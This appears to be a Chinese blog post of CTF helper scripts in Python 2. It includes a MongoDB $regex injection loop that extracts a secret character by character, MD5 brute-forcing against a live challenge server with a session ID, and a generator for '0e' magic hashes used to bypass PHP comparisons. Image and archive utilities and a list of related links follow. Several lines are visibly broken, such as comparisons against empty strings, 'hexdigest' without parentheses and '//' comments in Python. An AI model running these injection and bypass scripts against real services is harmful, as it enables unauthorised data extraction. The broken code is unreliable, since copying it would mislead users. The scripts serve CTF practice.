1.利用像素点还原图片。

 from PIL import Image

 import re

 if __name__ == '__main__':

     x = 887 //将像素点个数进行分解,可以确定图片的长宽

     y = 111

     i = 0

     j = 0

     c = Image.new("RGB", (x,y))

     file_object = open('ce.txt') //ce.txt中保存着像素点的坐标

     for i in range(0,  x):

         for j in range(0,  y):

             line = file_object.next() //每次读取一个像素点

             lst = line.split(",") //lst生成一个元组

             c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

     c.show()

     c.save("c.png")

2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。

 #coding : utf8

 import requests

 import re

 import hashlib

 import itertools

 s = requests.session()  //建立一个session对话

 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"

 data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}

 content = s.get(url=url,data=data)

 target = re.findall("sh\"\>(.*)\<",content.text)

 target = target[0]

 poc = re.findall("code\"\>(.*)\<",content.text)

 str1 = poc[0]

 a = [''.join(x) for x in itertools.permutations(str1, 9)]  //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组

 for i in range(0,len(a)):

 final = hashlib.md5(a[i])

 if final.hexdigest() == target:

 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])

 print flag.content

 print flag.headers

3.利用py将base64编码的字符串还原成图片

 import os,base64

 strs='''''sdasdas==''' //已经编码的base64字符串 

 imgdata=base64.b64decode(strs)

 file=open('1.jpg','wb')

 file.write(imgdata)

 file.close()

4.生成0e哈希值:

 #coding:utf-8

 import hashlib

 import itertools

 def go():

     payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]

     i = 0

     print payload

     for j in itertools.product(payload,repeat=30): #repeat参数指定长度

         payloads = "".join(j)

         #print pow

         #i = i+ 1

         #if i == 10:

         #    break

         str1 = hashlib.md5(payloads).hexdigest + "SALT"

         str2 = hashlib.md5(str1)

         if (str2[0]=="") & (str2[1]=="e") & (str2[2:].isdigit()):

             print payloads

 go()

5.mongodb基于正则注入:

 #coding:utf-8

 import requests

 import string

 # print string.ascii_letters

 # print string.digits

 flag = "c1ctf{"

 payload = string.ascii_letters + string.digits

 url = "http://xx.x.x.x/index.php?"

 restsrt = True

 while restsrt:

     restsrt = False

     for i in payload:

         payloads = flag + i

         post_data = {"username":"admin","passwd[$regex]":flag+".*"}

         #post_data = {"username":"admin","passwd[$regex]":"^"+flag}

         r = requests.get(url = url,data = post_data,allow_redirects = False)

         if r.status_code == "":

             print payloads

             flag = flag + i

             restsrt =True

             if i == "}":

                 exit(0)

             break

6.多次压缩打包

 #coding:utf-8

 import tarfile

 for i in range(1,2):

     tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩

     tfile.add("flag.py")

     tfile.close()

 for i in range(1,300):

     tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")

     tfile.add("1.php")

     tfile.add("shell"+str(i-1)+".tar.gz")

     tfile.close()

7.多次解压:

 #coding:utf-8

 import tarfile

 for i in range(1,300)[::-1]:

     file = tarfile.open("shell"+str(i)+"tar.gz")

     file.extractall()

     file.close()

积累一点ctf需要掌握的常见脚本知识的更多相关文章

  1. shell常见脚本30例

    shell常见脚本30例 author:headsen chen  2017-10-19  10:12:12 本文原素材出自网上,特此申明.有些地方加入我自己的改动 常见的30例shell脚本 1.用 ...

  2. Python简单的CTF题目hash碰撞小脚本

    Python简单的CTF题目hash碰撞小脚本 import hashlib for num in range(10000,9999999999): res = hashlib.sha1(str(nu ...

  3. Oracle手边常用70则脚本知识汇总

    Oracle手边常用70则脚本知识汇总 作者:白宁超 时间:2016年3月4日13:58:36 摘要: 日常使用oracle数据库过程中,常用脚本命令莫不是用户和密码.表空间.多表联合.执行语句等常规 ...

  4. ctf密码学------密文解码python脚本(凯撒解密)

    题目来源实验吧 分析题意,说是困在栅栏中,所以将字符栅栏解密看看有什么,利用工具CTFcraktools 得到三条密文 然后说是密码是凯撒,在将四栏依次凯撒解码,寻找可能的key,这里很显然,在尝试第 ...

  5. 放一点百度来的,常见的windowserror

    0操作成功完成.1功能错误.2系统找不到指定的文件.3系统找不到指定的路径.4系统无法打开文件.5拒绝访问.6句柄无效.7存储控制块被损坏.8存储空间不足,无法处理此命令.9存储控制块地址无效.10环 ...

  6. python 常见脚本

    一登录就发现了这篇博客,非常感谢作者,有时间会静下心来一点一滴的看 https://www.cnblogs.com/ailiailan/p/10141741.html

  7. bat脚本知识总结

    1常用基本命令 1.1 @ 它的作用是让执行窗口中不显示它后面这一行的命令本身 1.2 echo 它其实是一个开关命令,就是说它只有两种状态:打开和关闭.于是就有了echo on 和echo off两 ...

  8. 积累一些不太常用的c语言知识(不断更新)

    这里积累一些日常编程用得比较少的知识,不断添加. scanf("%c%*c%c",&a,&b); 其中的*表示跳过,本来输入三个数字,结果中间那个读入后被抛弃,a和 ...

  9. linux 常见基础知识(此文章将会在整个linux学习过程中,不断添加)

    1,linux 文件类型 普通文件 目录文件 链接文件 块设备 字符设备 Socket 管道文件 - d l b c s p 2,linux 文件属性 蓝色 绿色 浅蓝色 红色 灰色 目录 可执行文件 ...

随机推荐

  1. 从SQL下载大量数据到Excel

    之前不知设计原理,发生了大量数据(超过100w行)直接从数据库读取加载到网页中,直接导致内存溢出. Rediculous! 所以,现在改为分页查询到页面中. 由于其有全局逻辑,故折中每次加载1w条数据 ...

  2. TopShelf框架创建Windows服务作为Remoting的宿主案例:

    1.创建服务 using System; using System.Collections.Generic; using System.Linq; using System.Text; using S ...

  3. include,import,@class的区别

    1.#include与#import功能一样,都是导入头文件 2.区别是#include是单纯导入头文件,如果重复导入头文件,头文件就被导入多分 3.#import在导入头文件之前会检查之前是否导入过 ...

  4. 自定义View(三)实现简单的可拖动、可缩放的ImageView

    实现技术主要用到1.多点触摸  2.matrix的矩阵,平移.缩放 根据手指的数量判断是进行的拖动.还是缩放动作 package com.bi.xintest; import android.cont ...

  5. 清空IE缓存

    1.打开IE Internet选项 点击设置 2.打开临时文件 点击 查看文件 将目录下的 文件全部删除  重新打开网站即可 到此IE缓存就被删除.

  6. django搭建论坛之一环境配置

    环境情况: Description:    Ubuntu 15.04   Python版本:   Python 2.7.9 django版本: 1.8.4 安装django: pip install ...

  7. UIView中间透明周围半透明(四种方法)

    方法一 #import "DrawView.h" @implementation DrawView - (instancetype)initWithFrame:(CGRect)fr ...

  8. 总结最近移动端遇到的坑(auto-size + zepto)

    问题一:移动端页面双击会放大,图片时大时正常,布局偶尔很丑..刷新多遍又乜有问题 解决:所有图片设置宽高100%,最外面的html,给个 <meta name="viewport&qu ...

  9. Server.mappath用法

    1.Server.MapPath ("/") 应用程序根目录所在的位置 如 C:\qq\qqroot\ 2.Server.MapPath ("./") 表示所在 ...

  10. 通过反射及注解的运用获取SQL语句

    import java.lang.reflect.*; public class BeanUtil { //这是拼接查询SQL语句的方法(getDelectSQL) public static Str ...